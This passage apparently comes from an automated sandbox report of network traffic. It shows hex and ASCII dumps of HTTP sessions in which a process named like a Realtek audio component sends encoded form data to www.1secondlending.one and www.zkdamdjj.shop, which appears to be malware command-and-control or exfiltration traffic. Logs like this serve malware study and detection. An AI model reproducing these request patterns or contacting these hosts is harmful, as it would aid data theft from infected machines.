                                                                                                                                                                              Jan 11, 2025 03:56:43.045666933 CET1220INData Raw: 65 6e 22 3b 69 66 28 22 63 6d 70 5f 67 65 74 6c 61 6e 67 22 20 69 6e 20 68 29 7b 6f 3d 68 2e 63 6d 70 5f 67 65 74 6c 61 6e 67 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 69 66 28 22 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73
                                                                                                                                                                              Data Ascii: en";if("cmp_getlang" in h){o=h.cmp_getlang().toLowerCase();if("cmp_customlanguages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var
                                                                                                                                                                              Jan 11, 2025 03:56:43.045799017 CET1220INData Raw: 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 72 29 3a 22 22 29 2b 28 6e 21 3d 22 22 3f 22 26 63 6d 70 61 74 74 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 3a 22 22 29 2b 28 22 63 6d 70 5f 70 61 72 61 6d 73
                                                                                                                                                                              Data Ascii: encodeURIComponent(r):"")+(n!=""?"&cmpatt="+encodeURIComponent(n):"")+("cmp_params" in h?"&"+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.cu
                                                                                                                                                                              Jan 11, 2025 03:56:43.045914888 CET1220INData Raw: 3d 30 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 7d 7d 7d 29 28 29 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 3d 66 75 6e 63
                                                                                                                                                                              Data Ascii: =0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}})();window.cmp_addFrame=function(b){if(!window.frames[b]){if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking"
                                                                                                                                                                              Jan 11, 2025 03:56:43.046042919 CET1220INData Raw: 61 5b 30 5d 3d 3d 3d 22 67 65 74 55 53 50 44 61 74 61 22 29 7b 61 5b 32 5d 28 7b 76 65 72 73 69 6f 6e 3a 31 2c 75 73 70 53 74 72 69 6e 67 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 72 63 28 22 22 29 7d 2c 74 72 75 65 29 7d 65 6c 73 65 7b 69 66 28 61 5b
                                                                                                                                                                              Data Ascii: a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.leng
                                                                                                                                                                              Jan 11, 2025 03:56:43.106545925 CET1220INData Raw: 61 74 61 22 29 7b 72 65 74 75 72 6e 7b 73 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a 5b 5d 2c 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f 6e 73 3a 5b 30 5d 2c 67 70 70 53 74 72
                                                                                                                                                                              Data Ascii: ata"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.
                                                                                                                                                                              Jan 11, 2025 03:56:43.193376064 CET1220INData Raw: 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a
                                                                                                                                                                              Data Ascii: nValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(win
                                                                                                                                                                              Jan 11, 2025 03:56:43.193422079 CET1220INData Raw: 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 75 73 70 61 70 69 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61
                                                                                                                                                                              Data Ascii: in window)||!window.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascrip


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              29192.168.11.204978743.205.198.29806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:49.177357912 CET773OUTPOST /j8pv/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.1secondlending.one
                                                                                                                                                                              Origin: http://www.1secondlending.one
                                                                                                                                                                              Referer: http://www.1secondlending.one/j8pv/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4f 52 33 54 75 71 4b 32 67 39 58 30 37 6d 46 50 44 44 71 64 6b 57 31 64 50 6d 38 4c 75 36 36 2f 43 74 37 43 6c 54 35 2b 31 6b 6a 30 72 77 4e 68 50 52 63 2b 51 47 47 4c 36 32 57 50 44 52 62 43 4a 57 48 4d 70 4a 45 7a 31 41 70 2f 59 74 4d 43 52 59 4a 62 4f 51 7a 6f 66 66 57 61 37 78 30 57 42 31 71 45 6c 32 68 6d 55 66 4d 77 50 57 47 2b 33 79 66 39 32 2b 72 47 61 53 70 46 4a 66 35 71 44 71 70 4a 7a 50 50 4b 7a 38 62 6f 4b 51 51 33 77 38 66 66 74 2b 4b 55 34 66 64 38 52 30 5a 70 57 78 7a 59 52 36 61 37 59 75 6e 48 4a 6c 49 51 7a 31 54 45 39 77 3d 3d
                                                                                                                                                                              Data Ascii: iS=EKGD+FNVk+GOOR3TuqK2g9X07mFPDDqdkW1dPm8Lu66/Ct7ClT5+1kj0rwNhPRc+QGGL62WPDRbCJWHMpJEz1Ap/YtMCRYJbOQzoffWa7x0WB1qEl2hmUfMwPWG+3yf92+rGaSpFJf5qDqpJzPPKz8boKQQ3w8fft+KU4fd8R0ZpWxzYR6a7YunHJlIQz1TE9w==
                                                                                                                                                                              Jan 11, 2025 03:56:49.523633003 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:49 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              30192.168.11.204978843.205.198.29806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:52.052154064 CET793OUTPOST /j8pv/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.1secondlending.one
                                                                                                                                                                              Origin: http://www.1secondlending.one
                                                                                                                                                                              Referer: http://www.1secondlending.one/j8pv/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4d 78 48 54 6f 4e 57 32 6f 39 58 7a 2b 6d 46 50 59 7a 72 57 6b 57 35 64 50 69 73 62 76 49 65 2f 43 4a 33 43 6b 53 35 2b 35 45 6a 30 67 51 4e 6b 4c 52 63 31 51 48 37 2b 36 7a 57 50 44 52 2f 43 4a 55 66 4d 70 65 51 77 31 51 70 78 51 4e 4d 45 66 34 4a 62 4f 51 7a 6f 66 66 44 39 37 78 73 57 43 46 61 45 6d 55 4a 6c 58 66 4d 2f 4f 57 47 2b 6d 43 66 35 32 2b 71 72 61 51 64 72 4a 64 42 71 44 6f 78 4a 30 65 50 4a 36 38 61 6a 4f 51 52 70 33 2f 4f 7a 72 4e 65 6c 7a 75 67 6e 57 58 59 53 54 6e 2b 43 4d 49 75 66 62 39 37 31 4e 56 78 34 78 33 53 66 67 36 35 4b 46 58 54 73 38 78 71 77 5a 65 63 6c 57 32 30 54 36 34 45 3d
                                                                                                                                                                              Data Ascii: iS=EKGD+FNVk+GOMxHToNW2o9Xz+mFPYzrWkW5dPisbvIe/CJ3CkS5+5Ej0gQNkLRc1QH7+6zWPDR/CJUfMpeQw1QpxQNMEf4JbOQzoffD97xsWCFaEmUJlXfM/OWG+mCf52+qraQdrJdBqDoxJ0ePJ68ajOQRp3/OzrNelzugnWXYSTn+CMIufb971NVx4x3Sfg65KFXTs8xqwZeclW20T64E=
                                                                                                                                                                              Jan 11, 2025 03:56:52.406898022 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:52 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              31192.168.11.204978943.205.198.29806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:54.927495956 CET2578OUTPOST /j8pv/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.1secondlending.one
                                                                                                                                                                              Origin: http://www.1secondlending.one
                                                                                                                                                                              Referer: http://www.1secondlending.one/j8pv/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4d 78 48 54 6f 4e 57 32 6f 39 58 7a 2b 6d 46 50 59 7a 72 57 6b 57 35 64 50 69 73 62 76 49 57 2f 43 36 2f 43 6c 78 52 2b 34 45 6a 30 74 77 4e 6c 4c 52 63 53 51 47 54 36 36 7a 53 35 44 54 58 43 49 33 58 4d 38 62 73 77 6d 77 70 78 50 39 4d 46 52 59 4a 53 4f 55 66 30 66 66 54 39 37 78 73 57 43 48 43 45 77 32 68 6c 52 66 4d 77 50 57 47 49 33 79 66 56 32 2b 54 65 61 51 5a 56 4a 4d 68 71 43 49 68 4a 79 73 6e 4a 78 38 61 68 4a 51 52 68 33 2f 43 73 72 4e 53 44 7a 74 39 41 57 55 34 53 52 7a 79 42 5a 37 43 49 50 73 4c 58 51 48 6c 39 6d 6c 47 76 72 49 34 33 56 6b 6e 46 37 6c 32 2f 47 38 51 4e 47 46 64 56 73 63 78 6a 2b 67 65 42 45 38 30 47 6d 37 41 72 51 42 31 59 69 6e 2f 2b 75 33 36 35 78 52 52 76 2f 2f 56 35 2f 75 4c 36 67 63 45 75 31 78 44 49 4e 36 7a 51 46 45 66 67 42 4a 7a 50 78 4f 65 69 38 58 75 6c 78 31 41 44 48 4c 34 4a 72 6d 6d 66 66 76 51 37 6d 69 38 50 77 46 67 62 4a 69 64 75 79 6c 30 66 2f 75 6e 53 75 4c 42 63 33 65 59 4c 30 46 78 76 35 47 59 37 6f 64 38 [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=EKGD+FNVk+GOMxHToNW2o9Xz+mFPYzrWkW5dPisbvIW/C6/ClxR+4Ej0twNlLRcSQGT66zS5DTXCI3XM8bswmwpxP9MFRYJSOUf0ffT97xsWCHCEw2hlRfMwPWGI3yfV2+TeaQZVJMhqCIhJysnJx8ahJQRh3/CsrNSDzt9AWU4SRzyBZ7CIPsLXQHl9mlGvrI43VknF7l2/G8QNGFdVscxj+geBE80Gm7ArQB1Yin/+u365xRRv//V5/uL6gcEu1xDIN6zQFEfgBJzPxOei8Xulx1ADHL4JrmmffvQ7mi8PwFgbJiduyl0f/unSuLBc3eYL0Fxv5GY7od8DbzMzXBRG1Ojc8dDlJpSEAMA1ifwhXADOyeNkhenUtmqM5cv0Rfs0y9GxLej1fIFjXHZf/eVAa1yqLNjftqNaRwRoGZNSZfLvLbqS7TB5vG9NOlhFepra4VLR6nzq8pbOC4EDNMcALXUces1RaUTFuTojQJF9i/Lc7zrJTcUYExgm5XwbbV8tXc3iXb9nBLkDzI8JIFh7R7die3OXNZcncimPy6jN02kv034WArteu2zqOkfnXeT1ShHvFzitsyapANsNqyGFnC2kPdLgHXR54HOIms+kQv8aDGuXW/C70wRNNgW60ekG0EvxZr0qdnc25ReQ5vKTxjRHeXRzSj25D4XEUJwzvW6p4c7FjsOnT0RQ/d4+BotfXcB2XdcRrMUPN8EIb3CgxmYSq47sVsmD1rga12Wvd2j3M35kspvfWJtf28FDUffPhqzNXRGVHyeUMMXi7vGQCisnJIyH4n3TIvWwjMxQfM19EQRVmbzwaK/+U8/Na3/7PSclD1bEUT/zAlRvdhAH95cWm6ODwEox/b/oCOC5Jd2NXh/1bYkqrMQ5zOEJh9w7YuIAm/hP5BuZ9syYOY3818REH1N9P+MEBAi01UQmX8zq3sGE2nUe96iV750aYuYE672S9eyjE6PaUrd3W6iaPqgrj1veISYaR8ISHWd7ms6nO [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:56:54.927582026 CET5364OUTData Raw: 34 51 34 4c 6e 68 4f 6b 64 34 69 54 4a 54 37 57 68 56 44 65 42 6e 2f 35 6a 38 44 6a 76 67 38 59 48 71 31 72 45 39 2b 46 6a 69 6f 45 75 58 67 33 6b 66 45 6f 62 2f 71 70 54 6b 35 66 2b 42 57 34 31 79 66 7a 65 45 34 5a 73 72 4b 7a 6b 76 47 57 57 6f
                                                                                                                                                                              Data Ascii: 4Q4LnhOkd4iTJT7WhVDeBn/5j8Djvg8YHq1rE9+FjioEuXg3kfEob/qpTk5f+BW41yfzeE4ZsrKzkvGWWo+EUtC8oDIjp8vgvGgxmHmVQThB5NgFNtrFv06567VGJhDUGOJhYCuWVBX3NefWFqSayVZwvtGBIEC3wExk3s95GIbQ4Z38GDJULwtKtRh11M4LCqu1R90uNTLMnDaSOU6ZkfC/XJZvY9SmMYjjbODJjEB2cbWJW/s
                                                                                                                                                                              Jan 11, 2025 03:56:55.277880907 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:55 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              32192.168.11.204979043.205.198.29806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:57.798068047 CET493OUTGET /j8pv/?iS=JIuj9wxSnK6mEyWE+aiov6ee/jFUGAOavn5HAjA8ht24L6v+vQ9uqWj6ig59Dwg+VmGSo2u3Iy71OFL1070b+iEHSPgDI61AbnX1cIuegQgrBk3SzXJVVb4=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.1secondlending.one
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:56:58.144905090 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:57 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              33192.168.11.2049791104.21.40.167806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:57:03.399947882 CET758OUTPOST /swhs/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.zkdamdjj.shop
                                                                                                                                                                              Origin: http://www.zkdamdjj.shop
                                                                                                                                                                              Referer: http://www.zkdamdjj.shop/swhs/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 37 78 49 2b 45 65 4b 55 64 49 43 74 4e 67 31 32 6d 61 62 6e 6a 41 66 6d 32 2f 75 75 2f 56 77 59 6b 43 44 53 70 68 37 52 2b 74 4a 51 48 36 72 6d 7a 49 6a 51 78 52 47 67 4b 6c 34 37 42 63 4c 4d 68 6e 55 4b 44 57 66 62 51 56 6f 6a 52 67 44 7a 59 50 6d 4c 62 30 6c 54 63 50 69 41 65 31 37 75 6d 59 6d 52 62 67 4f 6a 69 61 70 35 77 61 4c 4b 72 35 6b 50 68 4d 4d 35 70 69 39 7a 67 36 6c 6c 5a 34 77 36 67 34 44 2b 4e 55 56 70 77 68 67 50 49 53 59 35 39 64 61 55 74 64 64 4b 75 59 49 59 63 31 55 45 78 63 68 71 72 75 72 6f 36 74 68 41 69 48 50 6d 39 77 3d 3d
                                                                                                                                                                              Data Ascii: iS=xz3VGnN6YJI+7xI+EeKUdICtNg12mabnjAfm2/uu/VwYkCDSph7R+tJQH6rmzIjQxRGgKl47BcLMhnUKDWfbQVojRgDzYPmLb0lTcPiAe17umYmRbgOjiap5waLKr5kPhMM5pi9zg6llZ4w6g4D+NUVpwhgPISY59daUtddKuYIYc1UExchqruro6thAiHPm9w==


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              34192.168.11.2049792104.21.40.167806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:57:06.053541899 CET778OUTPOST /swhs/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
